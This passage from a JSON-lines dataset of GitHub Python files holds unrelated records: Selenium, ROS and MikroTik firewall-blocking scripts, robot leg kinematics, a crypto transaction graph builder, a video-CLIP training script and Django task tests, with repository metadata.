)\n\n# COMMAND ----------\n\nfor table_config in get_tables_to_ingest():\n # spin up our ingestions in parallel\n generate_tables(table_config['name'], table_config['identity_cols'])\n","repo_name":"adrian-tompkins/dlt-workshop-2022-05-16","sub_path":"Lab 01 - Data Engineering/06 - Delta Live Tables (Python - CDC).py","file_name":"06 - Delta Live Tables (Python - CDC).py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"884640261","text":"def solution(record):\n nick_dic = {}\n actions = []\n for i in record:\n s_record = i.split()\n\n if s_record[0] == \"Leave\":\n actions.append((0, s_record[1]))\n\n elif s_record[0] == \"Enter\":\n nick_dic[s_record[1]] = s_record[2]\n actions.append((1, s_record[1]))\n else:\n nick_dic[s_record[1]] = s_record[2]\n answer = []\n for i in actions:\n if i[0] == 0:\n answer.append(f\"{nick_dic[i[1]]}님이 나갔습니다.\")\n else:\n answer.append(f\"{nick_dic[i[1]]}님이 들어왔습니다.\")\n\n\n\n return answer\n\n\nanswer = solution([\"Enter uid1234 Muzi\", \"Enter uid4567 Prodo\",\"Leave uid1234\",\"Enter uid1234 Prodo\",\"Change uid4567 Ryan\"])\nfor i in answer:\n print(i)","repo_name":"mullung2727/Algorithm-","sub_path":"1111/lv2 오픈채팅방.py","file_name":"lv2 오픈채팅방.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"28863803570","text":"\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver import ActionChains\n\n\ndriver=webdriver.Chrome(executable_path=\"C:\\\\Drivers\\\\chromedriver.exe\")\n\ndriver.implicitly_wait(10)\n\ndriver.get(\"https://artoftesting.com/sampleSiteForSelenium\")\n\ndriver.maximize_window()\n\ntime.sleep(5)\n\ndblElement=driver.find_element_by_id(\"dblClkBtn\")\n\naction=ActionChains(driver)\n\naction.double_click(dblElement).perform()\n\ntime.sleep(5)\n\ndriver.quit()\n\n","repo_name":"rams4automation/SeleniumPython","sub_path":"SeleniumwithPython/Doublclik.py","file_name":"Doublclik.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"25336686334","text":"import rospy\nfrom typing import Dict, Tuple\nfrom archemist.core.processing.handler import StationHandler\nfrom archemist.core.state.station import Station\nfrom colorimetry_msgs.msg import ColorimetryCommand,ColorimetryRGBResult, ColorimetryLABResult\nfrom .state import SampleColorLABOpDescriptor, SampleColorRGBOpDescriptor\n\nclass LightBoxROSHandler(StationHandler):\n def __init__(self, station:Station):\n super().__init__(station)\n rospy.init_node(f'{self._station}_handler')\n self.pubCamera = rospy.Publisher(\"/colorimetry_station/command\", ColorimetryCommand, queue_size=1)\n rospy.Subscriber(\"/colorimetry_station/result_rgb\", ColorimetryRGBResult, self._colorimetry_rgb_callback)\n rospy.Subscriber(\"/colorimetry_station/result_lab\", ColorimetryLABResult, self._colorimetry_lab_callback)\n self._received_results = False\n self._op_results = {}\n rospy.sleep(1)\n \n\n def run(self):\n rospy.loginfo(f'{self._station}_handler is running')\n try:\n while not rospy.is_shutdown():\n self.handle()\n rospy.sleep(2)\n except KeyboardInterrupt:\n rospy.loginfo(f'{self._station}_handler is terminating!!!')\n\n def execute_op(self):\n current_op = self._station.get_assigned_station_op()\n self._received_results = False\n self._op_results = {}\n if isinstance(current_op, SampleColorRGBOpDescriptor):\n op_msg = ColorimetryCommand()\n op_msg.op_name = 'rgb'\n for i in range(10):\n self.pubCamera.publish(op_msg)\n elif isinstance(current_op, SampleColorLABOpDescriptor):\n op_msg = ColorimetryCommand()\n op_msg.op_name = 'lab'\n for i in range(10):\n self.pubCamera.publish(op_msg)\n else:\n rospy.logwarn(f'[{self.__class__.__name__}] Unkown operation was received')\n\n def is_op_execution_complete(self) -> bool:\n return self._received_results\n\n def get_op_result(self) -> Tuple[bool, Dict]:\n return True, self._op_results\n\n def _colorimetry_rgb_callback(self, msg: ColorimetryRGBResult):\n self._received_results = True\n self._op_results['result_filename'] = msg.result_file_name\n self._op_results['red_intensity'] = msg.red_intensity\n self._op_results['blue_intensity'] = msg.blue_intensity\n self._op_results['green_intensity'] = msg.green_intensity\n self._op_results['color_index'] = msg.color_index\n\n def _colorimetry_lab_callback(self, msg: ColorimetryLABResult):\n self._received_results = True\n self._op_results['result_filename'] = msg.result_file_name\n self._op_results['l_value'] = msg.L_value\n self._op_results['a_value'] = msg.a_value\n self._op_results['b_value'] = msg.b_value\n self._op_results['color_index'] = msg.color_index\n\n \n","repo_name":"cooper-group-uol-robotics/archemist","sub_path":"src/archemist/stations/lightbox_station/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"32308466928","text":"#!/usr/bin/python3\nfrom netmiko import ConnectHandler\n\ndef connect_to_mikrotik(list):\n print(\"[!]Check your device type. Be sure this is the mikrotik and it has a mikrotik-routerOS[!]\")\n print(\"[!]Check configuration in mikrotik_main-router[!]\")\n print(\"[!]Establishing connection...[!]\")\n\n mikrotik_main_router = {\n 'device_type':'mikrotik_routeros',\n 'host':'192.168.88.1',\n 'port':'22',\n 'username':'admin',\n 'password':'',\n 'global_cmd_verify': False\n\n }\n sshCli = ConnectHandler(**mikrotik_main_router)\n for ip in list:\n command = \"/ip firewall filter add chain=forward src-address=\" + ip + \" action=drop comment=BlockedByScript\"\n sshCli.send_command(command)\n print(\"IP: \" + ip + \" was banned\")\n\n sshCli.disconnect()\n\nip_addresses = []\ndef read_ip():\n global ip_addresses\n filename = \"ip_lists.txt\"\n with open(filename,'r') as f:\n ip_addresses = f.read().split()\n\nread_ip()\nconnect_to_mikrotik(ip_addresses)\n","repo_name":"superbars/ip-banner-mikrotik","sub_path":"automatic.py","file_name":"automatic.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"4581111837","text":"#!/usr/bin/env python3\nfrom n_choose_k import choose\n\"\"\"\nThe choose function returns ways to choose k sized subset from a n sized set\nGetting the coefficients from choose() function we can divide each of them by 2^(layers-1) \nand append the values to the fractions array.\nThe fractions array then contains the fraction of all beads going in the bins for the range of bins given\nSo THE CONCENTRATION of beads in bins is just the sum of all elements times 100\n\"\"\"\n\ndef main(n, start, stop):\n fractions = []\n #iterate through all favourable values of k\n for k in range(start, stop+1):\n #calculate the fraction\n fract = choose(n, k)/2**n\n fractions.append(fract)\n\n #uncomment the following line to get a more verbose output\n #print(f\"TRACKING- k:{k} _______ fraction={fract}\")\n #calculate and print the concentration\n print(\"Concentration: \",sum(fractions)*100)\n\nif __name__ == \"__main__\":\n n = int(input(\"Enter layers on board:\"))-1\n print(\"Enter the start and stop point of values of k:-\")\n start = int(input(\"(K) start point:\"))\n stop = int(input(\"(K) end point:\"))\n main(n, start, stop)\n","repo_name":"roushan004/Discrete-Mathematics","sub_path":"Course2_scripts/Galton_board_solution.py","file_name":"Galton_board_solution.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"32916646472","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport lmdb\nimport numpy as np\n\nfrom proto import utils\nfrom proto import tensor_pb2\n\n\ndef create_db(output_file):\n print(\">>> Write database...\")\n LMDB_MAP_SIZE = 1 << 40 # MODIFY\n print(LMDB_MAP_SIZE)\n env = lmdb.open(output_file, map_size=LMDB_MAP_SIZE)\n\n checksum = 0\n with env.begin(write=True) as txn:\n for j in range(0, 1024):\n # MODIFY: add your own data reader / creator\n width = 64\n height = 32\n img_data = np.random.rand(3, width, height).astype(np.float32)\n label = np.asarray(j % 10)\n\n # Create TensorProtos\n tensor_protos = tensor_pb2.TensorProtos()\n img_tensor = utils.numpy_array_to_tensor(img_data)\n tensor_protos.protos.extend([img_tensor])\n\n label_tensor = utils.numpy_array_to_tensor(label)\n tensor_protos.protos.extend([label_tensor])\n txn.put(\n '{}'.format(j).encode('ascii'),\n tensor_protos.SerializeToString()\n )\n\n if (j % 16 == 0):\n print(\"Inserted {} rows\".format(j))\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"LMDB creation\"\n )\n parser.add_argument(\"--output_file\", type=str, default=None,\n help=\"Path to write the database to\",\n required=True)\n args = parser.parse_args()\n\n create_db(args.output_file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"npuichigo/pytorch_lmdb_dataset","sub_path":"create_lmdb.py","file_name":"create_lmdb.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"56"} +{"seq_id":"38966200927","text":"import os\nimport sys\nimport time\nimport argparse\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torch.nn.parallel import DistributedDataParallel\nimport torch.distributed as dist\nimport torch.backends.cudnn as cudnn\nfrom torch.cuda.amp import GradScaler\nimport torchvision\nimport torch.optim as optim\nfrom utils.utils import init_distributed_mode, AverageMeter, reduce_tensor, accuracy\nfrom utils.logger import setup_logger\nimport clip\n\nfrom pathlib import Path\nimport yaml\nimport pprint\nfrom dotmap import DotMap\nimport numpy as np\n\nimport datetime\nimport shutil\nfrom contextlib import suppress\n\n\nfrom datasets import Video_dataset\nfrom modules.video_clip import video_header, VideoCLIP\nfrom utils.Augmentation import get_augmentation\nfrom utils.solver import _lr_scheduler\nfrom modules.text_prompt import text_prompt\n\n\n\n\ndef epoch_saving(epoch, model, optimizer, filename):\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n }, filename) #just change to your preferred folder/filename\n\ndef best_saving(working_dir, epoch, model, optimizer):\n best_name = '{}/model_best.pt'.format(working_dir)\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n }, best_name) # just change to your preferred folder/filename\n\n\ndef update_dict(dict):\n new_dict = {}\n for k, v in dict.items():\n new_dict[k.replace('module.', '')] = v\n return new_dict\n\ndef get_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', '-cfg', type=str, default='clip.yaml', help='global config file')\n parser.add_argument('--log_time', default='001')\n parser.add_argument('--dist_url', default='env://',\n help='url used to set up distributed training')\n parser.add_argument('--world_size', default=1, type=int,\n help='number of distributed processes') \n parser.add_argument(\"--local_rank\", type=int,\n help='local rank for DistributedDataParallel')\n parser.add_argument(\n \"--precision\",\n choices=[\"amp\", \"fp16\", \"fp32\"],\n default=\"amp\",\n help=\"Floating point precition.\"\n ) \n args = parser.parse_args()\n return args\n\n\n\ndef main(args):\n global best_prec1\n \"\"\" Training Program \"\"\"\n init_distributed_mode(args)\n if args.distributed:\n print('[INFO] turn on distributed train', flush=True)\n else:\n print('[INFO] turn off distributed train', flush=True)\n\n with open(args.config, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n if 'shot' in config['data']:\n working_dir = os.path.join('./exp_fewshot', config['data']['dataset'], config['network']['arch'] , args.log_time)\n else:\n working_dir = os.path.join('./exp', config['data']['dataset'], config['network']['arch'] , args.log_time)\n\n if dist.get_rank() == 0:\n Path(working_dir).mkdir(parents=True, exist_ok=True)\n shutil.copy(args.config, working_dir)\n shutil.copy('train.py', working_dir)\n\n\n # build logger, print env and config\n logger = setup_logger(output=working_dir,\n distributed_rank=dist.get_rank(),\n name=f'Text4Vis')\n logger.info(\"------------------------------------\")\n logger.info(\"Environment Versions:\")\n logger.info(\"- Python: {}\".format(sys.version))\n logger.info(\"- PyTorch: {}\".format(torch.__version__))\n logger.info(\"- TorchVison: {}\".format(torchvision.__version__))\n logger.info(\"------------------------------------\")\n pp = pprint.PrettyPrinter(indent=4)\n logger.info(pp.pformat(config))\n logger.info(\"------------------------------------\")\n logger.info(\"storing name: {}\".format(working_dir))\n\n\n\n config = DotMap(config)\n\n device = \"cpu\"\n if torch.cuda.is_available():\n device = \"cuda\"\n cudnn.benchmark = True\n\n # fix the seed for reproducibility\n seed = config.seed + dist.get_rank()\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n # get fp16 model and weight\n model, clip_state_dict = clip.load(\n config.network.arch,\n device='cpu',jit=False,\n internal_modeling=config.network.tm,\n T=config.data.num_segments,\n dropout=config.network.drop_out,\n emb_dropout=config.network.emb_dropout,\n pretrain=config.network.init,\n joint_st=config.network.joint_st) # Must set jit=False for training\n\n transform_train = get_augmentation(True, config)\n transform_val = get_augmentation(False, config)\n\n # if config.data.randaug.N:\n # transform_train = randAugment(transform_train, config)\n\n logger.info('train transforms: {}'.format(transform_train.transforms))\n logger.info('val transforms: {}'.format(transform_val.transforms))\n\n\n video_head = video_header(\n config.network.sim_header,\n clip_state_dict)\n\n \n if args.precision == \"amp\" or args.precision == \"fp32\":\n model = model.float()\n\n\n train_data = Video_dataset(\n config.data.train_root, config.data.train_list,\n config.data.label_list, num_segments=config.data.num_segments,\n modality=config.data.modality,\n image_tmpl=config.data.image_tmpl, random_shift=config.data.random_shift,\n transform=transform_train, dense_sample=config.data.dense)\n \n ################ Few-shot data for training ###########\n if config.data.shot:\n cls_dict = {}\n for item in train_data.video_list:\n if item.label not in cls_dict:\n cls_dict[item.label] = [item]\n else:\n cls_dict[item.label].append(item)\n import random\n select_vids = []\n K = config.data.shot\n for category, v in cls_dict.items():\n slice = random.sample(v, K)\n select_vids.extend(slice)\n n_repeat = len(train_data.video_list) // len(select_vids)\n train_data.video_list = select_vids * n_repeat\n # print('########### number of videos: {} #########'.format(len(select_vids)))\n ########################################################\n\n\n\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_data) \n train_loader = DataLoader(train_data,\n batch_size=config.data.batch_size, num_workers=config.data.workers,\n sampler=train_sampler, drop_last=False)\n\n val_data = Video_dataset(\n config.data.val_root, config.data.val_list, config.data.label_list,\n random_shift=False, num_segments=config.data.num_segments,\n modality=config.data.modality,\n image_tmpl=config.data.image_tmpl,\n transform=transform_val, dense_sample=config.data.dense)\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_data)\n val_loader = DataLoader(val_data,\n batch_size=config.data.batch_size,num_workers=config.data.workers,\n sampler=val_sampler, drop_last=False)\n\n\n classes, _, text_dict = text_prompt(train_data)\n n_class = text_dict[0].size(0)\n #### generate classes feature ######\n class_feats_file = 'text_feats_{}_{}.pt'.format(config['data']['dataset'], config['network']['arch']).replace('/','')\n if os.path.isfile(class_feats_file):\n logger.info('=> load classes features from {}'.format(class_feats_file))\n classes_features = torch.load(class_feats_file)\n else:\n model.eval()\n with torch.no_grad():\n classes_features = model.encode_text(classes) # [n_class dim]\n # if dist.get_rank() == 0:\n # torch.save(classes_features.cpu(), class_feats_file)\n \n # random init\n # classes_features = torch.empty(n_class, config.network.n_emb)\n # nn.init.normal_(classes_features, std=1)\n\n # distilbert init\n # classes_features = torch.load('distilbert-base-k400.pt')\n\n # QR init\n # normal_init = np.array(np.random.normal(size=(config.network.n_emb,config.network.n_emb)), dtype='float32')\n # qq, rr = np.linalg.qr(normal_init, mode=\"complete\")\n # classes_features = torch.tensor(qq[:n_class])\n\n # LDA init\n # classes_features = torch.load('lda_0.1.pt').float()\n\n model_full = VideoCLIP(model, video_head, config.data.num_segments)\n\n\n criterion = torch.nn.CrossEntropyLoss()\n\n start_epoch = config.solver.start_epoch\n \n if config.pretrain:\n if os.path.isfile(config.pretrain):\n logger.info(\"=> loading checkpoint '{}'\".format(config.pretrain))\n checkpoint = torch.load(config.pretrain, map_location='cpu')\n model_full.load_state_dict(checkpoint['model_state_dict'])\n del checkpoint\n else:\n logger.info(\"=> no checkpoint found at '{}'\".format(config.resume))\n \n if config.resume:\n if os.path.isfile(config.resume):\n logger.info(\"=> loading checkpoint '{}'\".format(config.resume))\n checkpoint = torch.load(config.resume, map_location='cpu')\n model_full.load_state_dict(update_dict(checkpoint['model_state_dict']))\n start_epoch = checkpoint['epoch'] + 1\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(config.evaluate, checkpoint['epoch']))\n del checkpoint\n else:\n logger.info(\"=> no checkpoint found at '{}'\".format(config.pretrain))\n\n\n\n\n clip_params = []\n other_params = []\n for name, param in model_full.named_parameters(): \n if 'visual' in name and 'control_point' not in name:\n clip_params.append(param)\n elif 'logit_scale' in name:\n clip_params.append(param)\n else:\n other_params.append(param)\n optimizer = optim.AdamW([{'params': clip_params, 'lr': config.solver.lr * config.solver.clip_ratio}, \n {'params': other_params, 'lr': config.solver.lr}],\n betas=(0.9, 0.999), lr=config.solver.lr, eps=1e-8,\n weight_decay=config.solver.weight_decay) \n\n lr_scheduler = _lr_scheduler(config, optimizer)\n\n if args.distributed:\n model_full = DistributedDataParallel(model_full.cuda(), device_ids=[args.gpu])\n model_without_ddp = model_full.module\n\n\n scaler = GradScaler() if args.precision == \"amp\" else None\n\n\n best_prec1 = 0.0\n if config.solver.evaluate:\n logger.info((\"===========evaluate===========\"))\n prec1 = validate(\n start_epoch,\n val_loader, device, \n model_full, config, classes_features, logger)\n return\n\n\n\n for epoch in range(start_epoch, config.solver.epochs):\n if args.distributed:\n train_loader.sampler.set_epoch(epoch) \n\n train(model_full, train_loader, optimizer, criterion, scaler,\n epoch, device, lr_scheduler, config, classes_features, logger)\n\n if (epoch+1) % config.logging.eval_freq == 0: # and epoch>0\n prec1 = validate(epoch, val_loader, device, model_full, config, classes_features, logger)\n\n if dist.get_rank() == 0:\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n logger.info('Testing: {}/{}'.format(prec1,best_prec1))\n logger.info('Saving:')\n filename = \"{}/last_model.pt\".format(working_dir)\n\n epoch_saving(epoch, model_without_ddp, optimizer, filename)\n if is_best:\n best_saving(working_dir, epoch, model_without_ddp, optimizer)\n\n\ndef train(model, train_loader, optimizer, criterion, scaler,\n epoch, device, lr_scheduler, config, text_embedding, logger):\n \"\"\" train a epoch \"\"\"\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n\n model.train()\n autocast = torch.cuda.amp.autocast if args.precision == 'amp' else suppress\n end = time.time()\n for i,(images, list_id) in enumerate(train_loader):\n if config.solver.type != 'monitor':\n if (i + 1) == 1 or (i + 1) % 10 == 0:\n lr_scheduler.step(epoch + i / len(train_loader))\n # lr_scheduler.step()\n\n data_time.update(time.time() - end)\n # b t3 h w\n images = images.view((-1, config.data.num_segments, 3) + images.size()[-2:]) # bt 3 h w\n\n b, t, c, h, w = images.size()\n\n images= images.view(-1, c, h, w) # omit the Image.fromarray if the images already in PIL format, change this line to images=list_image if using preprocess inside the dataset class\n\n with autocast():\n logits = model(images, text_embedding) # B 400\n loss = criterion(logits, list_id.to(device))\n\n # loss regularization\n loss = loss / config.solver.grad_accumulation_steps\n\n if scaler is not None:\n # back propagation\n scaler.scale(loss).backward()\n\n if (i + 1) % config.solver.grad_accumulation_steps == 0:\n scaler.step(optimizer) \n scaler.update() \n optimizer.zero_grad() # reset gradient\n \n else:\n # back propagation\n loss.backward()\n if (i + 1) % config.solver.grad_accumulation_steps == 0:\n optimizer.step() # update param\n optimizer.zero_grad() # reset gradient\n\n losses.update(loss.item(), logits.size(0))\n\n\n batch_time.update(time.time() - end)\n end = time.time() \n\n\n cur_iter = epoch * len(train_loader) + i\n max_iter = config.solver.epochs * len(train_loader)\n eta_sec = batch_time.avg * (max_iter - cur_iter + 1)\n eta_sec = str(datetime.timedelta(seconds=int(eta_sec))) \n\n if i % config.logging.print_freq == 0:\n logger.info(('Epoch: [{0}][{1}/{2}], lr: {lr:.2e}, eta: {3}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})'.format(\n epoch, i, len(train_loader), eta_sec, batch_time=batch_time, data_time=data_time, loss=losses,\n lr=optimizer.param_groups[-1]['lr']))) # TODO\n\n\n\n\ndef validate(epoch, val_loader, device, model, config, text_embedding, logger):\n top1 = AverageMeter()\n top5 = AverageMeter()\n model.eval()\n with torch.no_grad():\n for i, (image, class_id) in enumerate(val_loader):\n image = image.view((-1, config.data.num_segments, 3) + image.size()[-2:])\n b, t, c, h, w = image.size()\n class_id = class_id.to(device)\n text_embedding = text_embedding.to(device)\n image = image.to(device).view(-1, c, h, w)\n\n image_embedding = model.module.encode_image(image)\n image_embedding /= image_embedding.norm(dim=-1, keepdim=True)\n text_embedding /= text_embedding.norm(dim=-1, keepdim=True)\n similarity = (100.0 * image_embedding @ text_embedding.T)\n\n prec = accuracy(similarity, class_id, topk=(1, 5))\n prec1 = reduce_tensor(prec[0])\n prec5 = reduce_tensor(prec[1])\n\n top1.update(prec1.item(), class_id.size(0))\n top5.update(prec5.item(), class_id.size(0))\n\n if i % config.logging.print_freq == 0:\n logger.info(\n ('Test: [{0}/{1}]\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n i, len(val_loader), top1=top1, top5=top5)))\n\n logger.info(('Testing Results: Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'\n .format(top1=top1, top5=top5)))\n return top1.avg\n\n\nif __name__ == '__main__':\n args = get_parser() \n main(args)\n\n","repo_name":"whwu95/Text4Vis","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16108,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"56"} +{"seq_id":"2797340482","text":"import numpy as np\nfrom transforms3d.euler import euler2mat\n\n\ndef leg_explicit_inverse_kinematics(r_body_foot, leg_index, config):\n \"\"\"Find the joint angles corresponding to the given body-relative foot position for a given leg and configuration\n \n Parameters\n ----------\n r_body_foot : [type]\n [description]\n leg_index : [type]\n [description]\n config : [type]\n [description]\n \n Returns\n -------\n numpy array (3)\n Array of corresponding joint angles.\n \"\"\"\n (x, y, z) = r_body_foot\n\n # Distance from the leg origin to the foot, projected into the y-z plane\n R_body_foot_yz = (y ** 2 + z ** 2) ** 0.5\n\n # Distance from the leg's forward/back point of rotation to the foot\n R_hip_foot_yz = (R_body_foot_yz ** 2 - config.ABDUCTION_OFFSET ** 2) ** 0.5\n\n # Interior angle of the right triangle formed in the y-z plane by the leg that is coincident to the ab/adduction axis\n # For feet 2 (front left) and 4 (back left), the abduction offset is positive, for the right feet, the abduction offset is negative.\n arccos_argument = config.ABDUCTION_OFFSETS[leg_index] / R_body_foot_yz\n arccos_argument = np.clip(arccos_argument, -0.99, 0.99)\n phi = np.arccos(arccos_argument)\n\n # Angle of the y-z projection of the hip-to-foot vector, relative to the positive y-axis\n hip_foot_angle = np.arctan2(z, y)\n\n # Ab/adduction angle, relative to the positive y-axis\n abduction_angle = phi + hip_foot_angle\n\n # theta: Angle between the tilted negative z-axis and the hip-to-foot vector\n theta = np.arctan2(-x, R_hip_foot_yz)\n\n # Distance between the hip and foot\n R_hip_foot = (R_hip_foot_yz ** 2 + x ** 2) ** 0.5\n\n # Angle between the line going from hip to foot and the link L1\n arccos_argument = (config.LEG_L1 ** 2 + R_hip_foot ** 2 - config.LEG_L2 ** 2) / (\n 2 * config.LEG_L1 * R_hip_foot\n )\n arccos_argument = np.clip(arccos_argument, -0.99, 0.99)\n trident = np.arccos(arccos_argument)\n\n # Angle of the first link relative to the tilted negative z axis\n hip_angle = theta + trident\n\n # Angle between the leg links L1 and L2\n arccos_argument = (config.LEG_L1 ** 2 + config.LEG_L2 ** 2 - R_hip_foot ** 2) / (\n 2 * config.LEG_L1 * config.LEG_L2\n )\n arccos_argument = np.clip(arccos_argument, -0.99, 0.99)\n beta = np.arccos(arccos_argument)\n\n # Angle of the second link relative to the tilted negative z axis\n knee_angle = hip_angle - (np.pi - beta)\n\n return np.array([abduction_angle, hip_angle, knee_angle])\n\n\ndef four_legs_inverse_kinematics(r_body_foot, config):\n \"\"\"Find the joint angles for all twelve DOF correspoinding to the given matrix of body-relative foot positions.\n \n Parameters\n ----------\n r_body_foot : numpy array (3,4)\n Matrix of the body-frame foot positions. Each column corresponds to a separate foot.\n config : Config object\n Object of robot configuration parameters.\n \n Returns\n -------\n numpy array (3,4)\n Matrix of corresponding joint angles.\n \"\"\"\n alpha = np.zeros((3, 4))\n for i in range(4):\n body_offset = config.LEG_ORIGINS[:, i]\n alpha[:, i] = leg_explicit_inverse_kinematics(\n r_body_foot[:, i] - body_offset, i, config\n )\n return alpha\n","repo_name":"stanfordroboticsclub/StanfordQuadruped","sub_path":"pupper/Kinematics.py","file_name":"Kinematics.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","stars":1364,"dataset":"github-code","pt":"56"} +{"seq_id":"40376414456","text":"\"\"\"\nDefine graph class\n\"\"\"\nfrom collections import defaultdict\nfrom typing import Callable\nfrom networkx import Graph, DiGraph\nimport tqdm\n\n\nclass TransactionGraph:\n def __init__(self, *, transaction_file=None, total_time_steps: int = None):\n self.time_series_graph = dict()\n if transaction_file is not None:\n self._construct_from_file(transaction_file, total_time_steps)\n\n def _construct_from_file(self, transaction_file, total_time_steps: int = None):\n graph_generator = GraphGenerator(transaction_file)\n all_time_steps = graph_generator.time_steps\n if total_time_steps is not None:\n all_time_steps = all_time_steps[:total_time_steps]\n\n for time_step in tqdm.tqdm(all_time_steps):\n self.time_series_graph[time_step] = DiGraph()\n self.time_series_graph[time_step].add_edges_from(graph_generator.generate_edges(self.get_filter(time_step)))\n\n def get_filter(self, specified_time_step: int):\n def should_exclude(from_address: str, to_address: str, amount: float, time_step: int):\n return time_step != specified_time_step\n\n return should_exclude\n\nclass GraphGenerator:\n def __init__(self, transaction_file):\n self.transaction_file = transaction_file\n self.time_steps = self._all_time_steps()\n self.wallet_frequency = self._wallet_frequency()\n self.address2idx = dict()\n\n def generate_edges(self, should_exclude: Callable[[str, str, float, int], bool] = None):\n with open(self.transaction_file, 'r') as transaction_reader:\n for i, line in enumerate(transaction_reader.readlines()):\n if i == 0:\n # skip header line\n continue\n\n from_address, to_address, amount, trans_time_step, price, price_time = line.strip().split(',')\n if should_exclude(from_address, to_address, float(amount), int(trans_time_step)):\n continue\n\n if from_address not in self.address2idx:\n self.address2idx[from_address] = len(self.address2idx)\n if to_address not in self.address2idx:\n self.address2idx[to_address] = len(self.address2idx)\n\n yield self.address2idx[from_address], self.address2idx[to_address], \\\n {'amount': float(amount), 'time_step':int(trans_time_step), 'price': float(price)}\n\n def _all_time_steps(self) -> list:\n all_time_steps = set()\n with open(self.transaction_file, 'r') as transaction_reader:\n for i, line in enumerate(transaction_reader.readlines()):\n if i == 0:\n continue\n\n _, _, _, time_step_str, _, _ = line.strip().split(',')\n all_time_steps.add(int(time_step_str))\n\n return sorted(list(all_time_steps))\n\n def _wallet_frequency(self):\n \"\"\"\n Get the most frequent appearing n wallet addresses in a given range of time_steps. Or find across whole file,\n if time_step is None\n :param n: the top number of address to use\n :param time_step: the time steps to pick from\n :return:\n \"\"\"\n address_count = defaultdict(int)\n with open(self.transaction_file, 'r') as transaction_reader:\n for i, line in enumerate(transaction_reader.readlines()):\n if i == 0:\n continue\n\n from_address, to_address, _, _, _, _ = line.strip().split(',')\n address_count[from_address] += 1\n address_count[to_address] += 1\n\n address_count = [(count, address) for address, count in address_count.items()]\n return sorted(address_count)\n","repo_name":"SCAuFish/Graph-Learning-on-Crypto-Transactions","sub_path":"graph_tools/components/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"12845883903","text":"# Q.3 Python object ko json string mai convert karne ka program likho?\n\n\n\nimport json\n\n# a={'Navgurukul': 100}\n# mystring=json.dumps(a)\n# print(mystring)\n\nx={\n \"name\":\"Rani\",\n \"Age\":17,\n \"city\":\"New York\"\n}\n# y=open(\"Meraki q3.json\",\"w\")\n# y.write(json.dump(x,y,indent=4))\n# y.close()\ny=json.dumps(x)\nprint(y)\n\n\n\n\n# import json\n# x = {\n# \"name\": \"John\",\n# \"age\": 30,\n# \"married\": True,\n# \"divorced\": False,\n# \"children\": (\"Ann\",\"Billy\"),\n# \"pets\": None,\n# \"cars\": [\n# {\"model\": \"BMW 230\", \"mpg\": 27.5},\n# {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n# ]\n# }\n# print(json.dumps(x, indent=4, separators=(\". \", \" = \"),sort_keys=True))\n\n","repo_name":"Rani-rathod/json","sub_path":"Question3.py","file_name":"Question3.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"14634394902","text":"from django.test import TestCase\nfrom task_manager.users.models import MyUser\nfrom task_manager.statuses.models import Status\nfrom task_manager.labels.models import Label\nfrom .models import Task\nfrom django.urls import reverse\nfrom django import test\n\n\n@test.modify_settings(\n MIDDLEWARE={\n \"remove\": [\n \"rollbar.contrib.django.middleware.RollbarNotifierMiddleware\",\n ]\n }\n)\nclass TaskTest(TestCase):\n fixtures = [\"user.json\", \"status.json\", \"task.json\", \"label.json\"]\n\n def setUp(self):\n self.user = MyUser.objects.last()\n self.task = Task.objects.last()\n self.status = Status.objects.last()\n self.labels = Label.objects.last()\n self.client.force_login(self.user)\n\n def test_setup(self):\n self.assertEqual(self.task.pk, 77)\n self.assertEqual(self.user.pk, 777)\n 